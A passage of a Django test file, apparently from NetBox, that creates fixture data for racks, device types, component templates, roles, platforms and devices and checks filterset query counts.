RackReservation(rack=racks[0], units=[1, 2, 3], user=users[0], tenant=tenants[0], description='foobar1'),
RackReservation(rack=racks[1], units=[4, 5, 6], user=users[1], tenant=tenants[1], description='foobar2'),
RackReservation(rack=racks[2], units=[7, 8, 9], user=users[2], tenant=tenants[2]),
)
RackReservation.objects.bulk_create(reservations)
def test_site(self):
sites = Site.objects.all()[:2]
params = {'site_id': [sites[0].pk, sites[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'site': [sites[0].slug, sites[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_location(self):
locations = Location.objects.all()[:2]
params = {'location_id': [locations[0].pk, locations[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'location': [locations[0].slug, locations[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_user(self):
users = User.objects.all()[:2]
params = {'user_id': [users[0].pk, users[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'user': [users[0].username, users[1].username]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant(self):
tenants = Tenant.objects.all()[:2]
params = {'tenant_id': [tenants[0].pk, tenants[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant': [tenants[0].slug, tenants[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_tenant_group(self):
tenant_groups = TenantGroup.objects.all()[:2]
params = {'tenant_group_id': [tenant_groups[0].pk, tenant_groups[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'tenant_group': [tenant_groups[0].slug, tenant_groups[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class ManufacturerTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Manufacturer.objects.all()
filterset = ManufacturerFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1', description='A'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2', description='B'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3', description='C'),
)
Manufacturer.objects.bulk_create(manufacturers)
def test_name(self):
params = {'name': ['Manufacturer 1', 'Manufacturer 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['manufacturer-1', 'manufacturer-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class DeviceTypeTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceType.objects.all()
filterset = DeviceTypeFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_types = (
DeviceType(manufacturer=manufacturers[0], model='Model 1', slug='model-1', part_number='Part Number 1', u_height=1, is_full_depth=True),
DeviceType(manufacturer=manufacturers[1], model='Model 2', slug='model-2', part_number='Part Number 2', u_height=2, is_full_depth=True, subdevice_role=SubdeviceRoleChoices.ROLE_PARENT, airflow=DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR),
DeviceType(manufacturer=manufacturers[2], model='Model 3', slug='model-3', part_number='Part Number 3', u_height=3, is_full_depth=False, subdevice_role=SubdeviceRoleChoices.ROLE_CHILD, airflow=DeviceAirflowChoices.AIRFLOW_REAR_TO_FRONT),
)
DeviceType.objects.bulk_create(device_types)
# Add component templates for filtering
ConsolePortTemplate.objects.bulk_create((
ConsolePortTemplate(device_type=device_types[0], name='Console Port 1'),
ConsolePortTemplate(device_type=device_types[1], name='Console Port 2'),
))
ConsoleServerPortTemplate.objects.bulk_create((
ConsoleServerPortTemplate(device_type=device_types[0], name='Console Server Port 1'),
ConsoleServerPortTemplate(device_type=device_types[1], name='Console Server Port 2'),
))
PowerPortTemplate.objects.bulk_create((
PowerPortTemplate(device_type=device_types[0], name='Power Port 1'),
PowerPortTemplate(device_type=device_types[1], name='Power Port 2'),
))
PowerOutletTemplate.objects.bulk_create((
PowerOutletTemplate(device_type=device_types[0], name='Power Outlet 1'),
PowerOutletTemplate(device_type=device_types[1], name='Power Outlet 2'),
))
InterfaceTemplate.objects.bulk_create((
InterfaceTemplate(device_type=device_types[0], name='Interface 1'),
InterfaceTemplate(device_type=device_types[1], name='Interface 2'),
))
rear_ports = (
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
)
RearPortTemplate.objects.bulk_create(rear_ports)
FrontPortTemplate.objects.bulk_create((
FrontPortTemplate(device_type=device_types[0], name='Front Port 1', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[0]),
FrontPortTemplate(device_type=device_types[1], name='Front Port 2', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[1]),
))
DeviceBayTemplate.objects.bulk_create((
DeviceBayTemplate(device_type=device_types[0], name='Device Bay 1'),
DeviceBayTemplate(device_type=device_types[1], name='Device Bay 2'),
))
def test_model(self):
params = {'model': ['Model 1', 'Model 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['model-1', 'model-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_part_number(self):
params = {'part_number': ['Part Number 1', 'Part Number 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_u_height(self):
params = {'u_height': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_is_full_depth(self):
params = {'is_full_depth': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'is_full_depth': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_subdevice_role(self):
params = {'subdevice_role': SubdeviceRoleChoices.ROLE_PARENT}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_airflow(self):
params = {'airflow': DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_console_ports(self):
params = {'console_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_console_server_ports(self):
params = {'console_server_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'console_server_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_ports(self):
params = {'power_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_power_outlets(self):
params = {'power_outlets': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'power_outlets': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_interfaces(self):
params = {'interfaces': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'interfaces': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_pass_through_ports(self):
params = {'pass_through_ports': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'pass_through_ports': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_device_bays(self):
params = {'device_bays': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'device_bays': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
class ConsolePortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsolePortTemplate.objects.all()
filterset = ConsolePortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
ConsolePortTemplate.objects.bulk_create((
ConsolePortTemplate(device_type=device_types[0], name='Console Port 1'),
ConsolePortTemplate(device_type=device_types[1], name='Console Port 2'),
ConsolePortTemplate(device_type=device_types[2], name='Console Port 3'),
))
def test_name(self):
params = {'name': ['Console Port 1', 'Console Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class ConsoleServerPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = ConsoleServerPortTemplate.objects.all()
filterset = ConsoleServerPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
ConsoleServerPortTemplate.objects.bulk_create((
ConsoleServerPortTemplate(device_type=device_types[0], name='Console Server Port 1'),
ConsoleServerPortTemplate(device_type=device_types[1], name='Console Server Port 2'),
ConsoleServerPortTemplate(device_type=device_types[2], name='Console Server Port 3'),
))
def test_name(self):
params = {'name': ['Console Server Port 1', 'Console Server Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerPortTemplate.objects.all()
filterset = PowerPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
PowerPortTemplate.objects.bulk_create((
PowerPortTemplate(device_type=device_types[0], name='Power Port 1', maximum_draw=100, allocated_draw=50),
PowerPortTemplate(device_type=device_types[1], name='Power Port 2', maximum_draw=200, allocated_draw=100),
PowerPortTemplate(device_type=device_types[2], name='Power Port 3', maximum_draw=300, allocated_draw=150),
))
def test_name(self):
params = {'name': ['Power Port 1', 'Power Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_maximum_draw(self):
params = {'maximum_draw': [100, 200]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_allocated_draw(self):
params = {'allocated_draw': [50, 100]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class PowerOutletTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = PowerOutletTemplate.objects.all()
filterset = PowerOutletTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
PowerOutletTemplate.objects.bulk_create((
PowerOutletTemplate(device_type=device_types[0], name='Power Outlet 1', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_A),
PowerOutletTemplate(device_type=device_types[1], name='Power Outlet 2', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_B),
PowerOutletTemplate(device_type=device_types[2], name='Power Outlet 3', feed_leg=PowerOutletFeedLegChoices.FEED_LEG_C),
))
def test_name(self):
params = {'name': ['Power Outlet 1', 'Power Outlet 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_feed_leg(self):
params = {'feed_leg': [PowerOutletFeedLegChoices.FEED_LEG_A, PowerOutletFeedLegChoices.FEED_LEG_B]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class InterfaceTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = InterfaceTemplate.objects.all()
filterset = InterfaceTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
InterfaceTemplate.objects.bulk_create((
InterfaceTemplate(device_type=device_types[0], name='Interface 1', type=InterfaceTypeChoices.TYPE_1GE_FIXED, mgmt_only=True),
InterfaceTemplate(device_type=device_types[1], name='Interface 2', type=InterfaceTypeChoices.TYPE_1GE_GBIC, mgmt_only=False),
InterfaceTemplate(device_type=device_types[2], name='Interface 3', type=InterfaceTypeChoices.TYPE_1GE_SFP, mgmt_only=False),
))
def test_name(self):
params = {'name': ['Interface 1', 'Interface 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [InterfaceTypeChoices.TYPE_1GE_FIXED, InterfaceTypeChoices.TYPE_1GE_GBIC]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_mgmt_only(self):
params = {'mgmt_only': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
params = {'mgmt_only': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
class FrontPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = FrontPortTemplate.objects.all()
filterset = FrontPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
rear_ports = (
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
RearPortTemplate(device_type=device_types[2], name='Rear Port 3', type=PortTypeChoices.TYPE_8P8C),
)
RearPortTemplate.objects.bulk_create(rear_ports)
FrontPortTemplate.objects.bulk_create((
FrontPortTemplate(device_type=device_types[0], name='Front Port 1', rear_port=rear_ports[0], type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED),
FrontPortTemplate(device_type=device_types[1], name='Front Port 2', rear_port=rear_ports[1], type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN),
FrontPortTemplate(device_type=device_types[2], name='Front Port 3', rear_port=rear_ports[2], type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE),
))
def test_name(self):
params = {'name': ['Front Port 1', 'Front Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
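# RearPortTemplate filtering: name, parent device type, port type, color, and positions.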
class RearPortTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = RearPortTemplate.objects.all()
filterset = RearPortTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
RearPortTemplate.objects.bulk_create((
RearPortTemplate(device_type=device_types[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C, color=ColorChoices.COLOR_RED, positions=1),
RearPortTemplate(device_type=device_types[1], name='Rear Port 2', type=PortTypeChoices.TYPE_110_PUNCH, color=ColorChoices.COLOR_GREEN, positions=2),
RearPortTemplate(device_type=device_types[2], name='Rear Port 3', type=PortTypeChoices.TYPE_BNC, color=ColorChoices.COLOR_BLUE, positions=3),
))
def test_name(self):
params = {'name': ['Rear Port 1', 'Rear Port 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_type(self):
params = {'type': [PortTypeChoices.TYPE_8P8C, PortTypeChoices.TYPE_110_PUNCH]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': [ColorChoices.COLOR_RED, ColorChoices.COLOR_GREEN]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_positions(self):
params = {'positions': [1, 2]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
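# DeviceBayTemplate filtering: name and parent device type.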
class DeviceBayTemplateTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceBayTemplate.objects.all()
filterset = DeviceBayTemplateFilterSet
@classmethod
def setUpTestData(cls):
manufacturer = Manufacturer.objects.create(name='Manufacturer 1', slug='manufacturer-1')
device_types = (
DeviceType(manufacturer=manufacturer, model='Model 1', slug='model-1'),
DeviceType(manufacturer=manufacturer, model='Model 2', slug='model-2'),
DeviceType(manufacturer=manufacturer, model='Model 3', slug='model-3'),
)
DeviceType.objects.bulk_create(device_types)
DeviceBayTemplate.objects.bulk_create((
DeviceBayTemplate(device_type=device_types[0], name='Device Bay 1'),
DeviceBayTemplate(device_type=device_types[1], name='Device Bay 2'),
DeviceBayTemplate(device_type=device_types[2], name='Device Bay 3'),
))
def test_name(self):
params = {'name': ['Device Bay 1', 'Device Bay 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_devicetype_id(self):
device_types = DeviceType.objects.all()[:2]
params = {'devicetype_id': [device_types[0].pk, device_types[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
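# DeviceRole filtering: name, slug, color, VM role flag, and description.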
class DeviceRoleTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = DeviceRole.objects.all()
filterset = DeviceRoleFilterSet
@classmethod
def setUpTestData(cls):
device_roles = (
DeviceRole(name='Device Role 1', slug='device-role-1', color='ff0000', vm_role=True, description='foobar1'),
DeviceRole(name='Device Role 2', slug='device-role-2', color='00ff00', vm_role=True, description='foobar2'),
DeviceRole(name='Device Role 3', slug='device-role-3', color='0000ff', vm_role=False),
)
DeviceRole.objects.bulk_create(device_roles)
def test_name(self):
params = {'name': ['Device Role 1', 'Device Role 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['device-role-1', 'device-role-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_color(self):
params = {'color': ['ff0000', '00ff00']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_vm_role(self):
params = {'vm_role': 'true'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'vm_role': 'false'}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)
def test_description(self):
params = {'description': ['foobar1', 'foobar2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
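# Platform filtering: name, slug, description, NAPALM driver, and manufacturer.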
class PlatformTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Platform.objects.all()
filterset = PlatformFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
platforms = (
Platform(name='Platform 1', slug='platform-1', manufacturer=manufacturers[0], napalm_driver='driver-1', description='A'),
Platform(name='Platform 2', slug='platform-2', manufacturer=manufacturers[1], napalm_driver='driver-2', description='B'),
Platform(name='Platform 3', slug='platform-3', manufacturer=manufacturers[2], napalm_driver='driver-3', description='C'),
)
Platform.objects.bulk_create(platforms)
def test_name(self):
params = {'name': ['Platform 1', 'Platform 2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_slug(self):
params = {'slug': ['platform-1', 'platform-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_description(self):
params = {'description': ['A', 'B']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_napalm_driver(self):
params = {'napalm_driver': ['driver-1', 'driver-2']}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
def test_manufacturer(self):
manufacturers = Manufacturer.objects.all()[:2]
params = {'manufacturer_id': [manufacturers[0].pk, manufacturers[1].pk]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
params = {'manufacturer': [manufacturers[0].slug, manufacturers[1].slug]}
self.assertEqual(self.filterset(params, self.queryset).qs.count(), 2)
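# Device filtering: identity, hardware, status, topology (region/site/location/rack),
# tenancy, virtual chassis membership, and component-presence filters. Every test
# follows the same pattern, e.g. (illustrative only, not one of the tests below):
#     params = {'status': [DeviceStatusChoices.STATUS_ACTIVE]}
#     self.assertEqual(self.filterset(params, self.queryset).qs.count(), 1)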
class DeviceTestCase(TestCase, ChangeLoggedFilterSetTests):
queryset = Device.objects.all()
filterset = DeviceFilterSet
@classmethod
def setUpTestData(cls):
manufacturers = (
Manufacturer(name='Manufacturer 1', slug='manufacturer-1'),
Manufacturer(name='Manufacturer 2', slug='manufacturer-2'),
Manufacturer(name='Manufacturer 3', slug='manufacturer-3'),
)
Manufacturer.objects.bulk_create(manufacturers)
device_types = (
DeviceType(manufacturer=manufacturers[0], model='Model 1', slug='model-1', is_full_depth=True),
DeviceType(manufacturer=manufacturers[1], model='Model 2', slug='model-2', is_full_depth=True),
DeviceType(manufacturer=manufacturers[2], model='Model 3', slug='model-3', is_full_depth=False),
)
DeviceType.objects.bulk_create(device_types)
device_roles = (
DeviceRole(name='Device Role 1', slug='device-role-1'),
DeviceRole(name='Device Role 2', slug='device-role-2'),
DeviceRole(name='Device Role 3', slug='device-role-3'),
)
DeviceRole.objects.bulk_create(device_roles)
platforms = (
Platform(name='Platform 1', slug='platform-1'),
Platform(name='Platform 2', slug='platform-2'),
Platform(name='Platform 3', slug='platform-3'),
)
Platform.objects.bulk_create(platforms)
regions = (
Region(name='Region 1', slug='region-1'),
Region(name='Region 2', slug='region-2'),
Region(name='Region 3', slug='region-3'),
)
for region in regions:
region.save()
groups = (
SiteGroup(name='Site Group 1', slug='site-group-1'),
SiteGroup(name='Site Group 2', slug='site-group-2'),
SiteGroup(name='Site Group 3', slug='site-group-3'),
)
for group in groups:
group.save()
sites = (
Site(name='Site 1', slug='site-1', region=regions[0], group=groups[0]),
Site(name='Site 2', slug='site-2', region=regions[1], group=groups[1]),
Site(name='Site 3', slug='site-3', region=regions[2], group=groups[2]),
)
Site.objects.bulk_create(sites)
locations = (
Location(name='Location 1', slug='location-1', site=sites[0]),
Location(name='Location 2', slug='location-2', site=sites[1]),
Location(name='Location 3', slug='location-3', site=sites[2]),
)
for location in locations:
location.save()
racks = (
Rack(name='Rack 1', site=sites[0], location=locations[0]),
Rack(name='Rack 2', site=sites[1], location=locations[1]),
Rack(name='Rack 3', site=sites[2], location=locations[2]),
)
Rack.objects.bulk_create(racks)
cluster_type = ClusterType.objects.create(name='Cluster Type 1', slug='cluster-type-1')
clusters = (
Cluster(name='Cluster 1', type=cluster_type),
Cluster(name='Cluster 2', type=cluster_type),
Cluster(name='Cluster 3', type=cluster_type),
)
Cluster.objects.bulk_create(clusters)
tenant_groups = (
TenantGroup(name='Tenant group 1', slug='tenant-group-1'),
TenantGroup(name='Tenant group 2', slug='tenant-group-2'),
TenantGroup(name='Tenant group 3', slug='tenant-group-3'),
)
for tenantgroup in tenant_groups:
tenantgroup.save()
tenants = (
Tenant(name='Tenant 1', slug='tenant-1', group=tenant_groups[0]),
Tenant(name='Tenant 2', slug='tenant-2', group=tenant_groups[1]),
Tenant(name='Tenant 3', slug='tenant-3', group=tenant_groups[2]),
)
Tenant.objects.bulk_create(tenants)
        devices = (
            Device(name='Device 1', device_type=device_types[0], device_role=device_roles[0], platform=platforms[0],
                   tenant=tenants[0], serial='ABC', asset_tag='1001', site=sites[0], location=locations[0], rack=racks[0],
                   position=1, face=DeviceFaceChoices.FACE_FRONT, status=DeviceStatusChoices.STATUS_ACTIVE,
                   cluster=clusters[0], local_context_data={"foo": 123}),
            Device(name='Device 2', device_type=device_types[1], device_role=device_roles[1], platform=platforms[1],
                   tenant=tenants[1], serial='DEF', asset_tag='1002', site=sites[1], location=locations[1], rack=racks[1],
                   position=2, face=DeviceFaceChoices.FACE_FRONT, status=DeviceStatusChoices.STATUS_STAGED,
                   airflow=DeviceAirflowChoices.AIRFLOW_FRONT_TO_REAR, cluster=clusters[1]),
            Device(name='Device 3', device_type=device_types[2], device_role=device_roles[2], platform=platforms[2],
                   tenant=tenants[2], serial='GHI', asset_tag='1003', site=sites[2], location=locations[2], rack=racks[2],
                   position=3, face=DeviceFaceChoices.FACE_REAR, status=DeviceStatusChoices.STATUS_FAILED,
                   airflow=DeviceAirflowChoices.AIRFLOW_REAR_TO_FRONT, cluster=clusters[2]),
        )
Device.objects.bulk_create(devices)
# Add components for filtering
ConsolePort.objects.bulk_create((
ConsolePort(device=devices[0], name='Console Port 1'),
ConsolePort(device=devices[1], name='Console Port 2'),
))
ConsoleServerPort.objects.bulk_create((
ConsoleServerPort(device=devices[0], name='Console Server Port 1'),
ConsoleServerPort(device=devices[1], name='Console Server Port 2'),
))
PowerPort.objects.bulk_create((
PowerPort(device=devices[0], name='Power Port 1'),
PowerPort(device=devices[1], name='Power Port 2'),
))
PowerOutlet.objects.bulk_create((
PowerOutlet(device=devices[0], name='Power Outlet 1'),
PowerOutlet(device=devices[1], name='Power Outlet 2'),
))
interfaces = (
Interface(device=devices[0], name='Interface 1', mac_address='00-00-00-00-00-01'),
Interface(device=devices[1], name='Interface 2', mac_address='00-00-00-00-00-02'),
)
Interface.objects.bulk_create(interfaces)
rear_ports = (
RearPort(device=devices[0], name='Rear Port 1', type=PortTypeChoices.TYPE_8P8C),
RearPort(device=devices[1], name='Rear Port 2', type=PortTypeChoices.TYPE_8P8C),
)
RearPort.objects.bulk_create(rear_ports)
FrontPort.objects.bulk_create((
FrontPort(device=devices[0], name='Front Port 1', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[0]),
FrontPort(device=devices[1], name='Front Port 2', type=PortTypeChoices.TYPE_8P8C, rear_port=rear_ports[1]),
))
DeviceBay.objects.bulk_create((
DeviceBay(device=devices[0], name='Device Bay 1'),
DeviceBay(device=devices[1], name='Device Bay 2'),
))
# Assign primary IPs for filtering
ipaddresses = (
IPAddress(address='192.0.2.1/24', assigned_object=interfaces[0]),
IPAddress(address='192.0.2.2/24', assigned_object=interfaces[1]),
)
IPAddress.objects.bulk_create(ipaddresses)
Device.objects.filter(pk=devices[0].pk).update(primary_ip4=ipaddresses[0])
Device.objects.filter(pk=devices[1].pk).update(primary_ip4=ipaddresses[1])
# VirtualChassis assignment for filtering
virtual_chassis = VirtualChassis.objects.create(master=devices[0])
Device.objects.filter(pk=devices[0].pk).update(virtual_chassis=virtual_chassis, vc_position=1, vc_priority=1)
